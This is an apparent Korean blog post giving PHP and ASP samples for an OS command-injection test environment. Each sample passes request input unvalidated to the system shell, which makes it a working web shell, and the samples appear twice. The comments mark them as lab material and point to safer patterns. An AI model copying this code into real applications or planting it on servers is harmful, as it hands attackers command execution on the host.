tips
OS Command Injection 환경예제
applicationlayer
2010. 1. 4. 14:05
PHP
<?php
// Intentionally vulnerable sample for a command-injection test environment.
// exec() hands its first argument to the system shell as one command string, so
// whoever controls $param controls what the server runs.
// NOTE(review): $param is not assigned anywhere in this snippet; presumably it is
// filled from the request by the surrounding lab setup. Confirm before reuse.
// Outside a lab, do not pass request data to a shell: select from a fixed
// allow-list of commands and wrap each argument in escapeshellarg().
//
// exec() returns the last line of output, appends every output line to $output,
// and stores the command's exit status in $return.
$last = exec($param, $output, $return);

// Show the captured output lines first, then the exit status.
echo print_r($output, true), "Return [$return]";
?>
ASP
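<%
' Intentionally vulnerable sample for a command-injection test environment.
' The "tex" request parameter is concatenated, unvalidated, into a cmd.exe
' command line, so whoever sends the request decides what the server executes.
' Outside a lab, do not hand request data to a shell: map the input onto a fixed
' allow-list of operations instead of building a command string.
' Detection hint: on the server this appears as the web worker process
' starting cmd.exe, which is worth alerting on.
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Fixed, shared output path: every request writes to the same file, so
' concurrent requests overwrite each other's output.
szTempFile = "C:\ttt.txt"
' Run(command, 0 = hidden window, True = wait until the command finishes);
' the command's standard output is redirected into the temp file.
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
' OpenTextFile(path, 1 = ForReading, False = do not create, 0 = ASCII)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
' Errors from here on (read, close, delete) are ignored rather than shown.
On Error Resume Next
' HTMLEncode keeps the command output from being interpreted as markup.
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
' Fixed: the page showed "CallCall", which is a VBScript syntax error.
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</BODY>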
<?php
// Intentionally vulnerable sample for a command-injection test environment.
// exec() hands its first argument to the system shell as one command string, so
// whoever controls $param controls what the server runs.
// NOTE(review): $param is not assigned anywhere in this snippet; presumably it is
// filled from the request by the surrounding lab setup. Confirm before reuse.
// Outside a lab, do not pass request data to a shell: select from a fixed
// allow-list of commands and wrap each argument in escapeshellarg().
//
// exec() returns the last line of output, appends every output line to $output,
// and stores the command's exit status in $return.
$last = exec($param, $output, $return);

// Show the captured output lines first, then the exit status.
echo print_r($output, true), "Return [$return]";
?>
ASP
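<%
' Intentionally vulnerable sample for a command-injection test environment.
' The "tex" request parameter is concatenated, unvalidated, into a cmd.exe
' command line, so whoever sends the request decides what the server executes.
' Outside a lab, do not hand request data to a shell: map the input onto a fixed
' allow-list of operations instead of building a command string.
' Detection hint: on the server this appears as the web worker process
' starting cmd.exe, which is worth alerting on.
szCMD = request("tex")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Fixed, shared output path: every request writes to the same file, so
' concurrent requests overwrite each other's output.
szTempFile = "C:\ttt.txt"
' Run(command, 0 = hidden window, True = wait until the command finishes);
' the command's standard output is redirected into the temp file.
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
' OpenTextFile(path, 1 = ForReading, False = do not create, 0 = ASCII)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
%>
<HTML>
<BODY>
<PRE>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
' Errors from here on (read, close, delete) are ignored rather than shown.
On Error Resume Next
' HTMLEncode keeps the command output from being interpreted as markup.
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
' Fixed: the page showed "CallCall", which is a VBScript syntax error.
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</PRE>
</BODY>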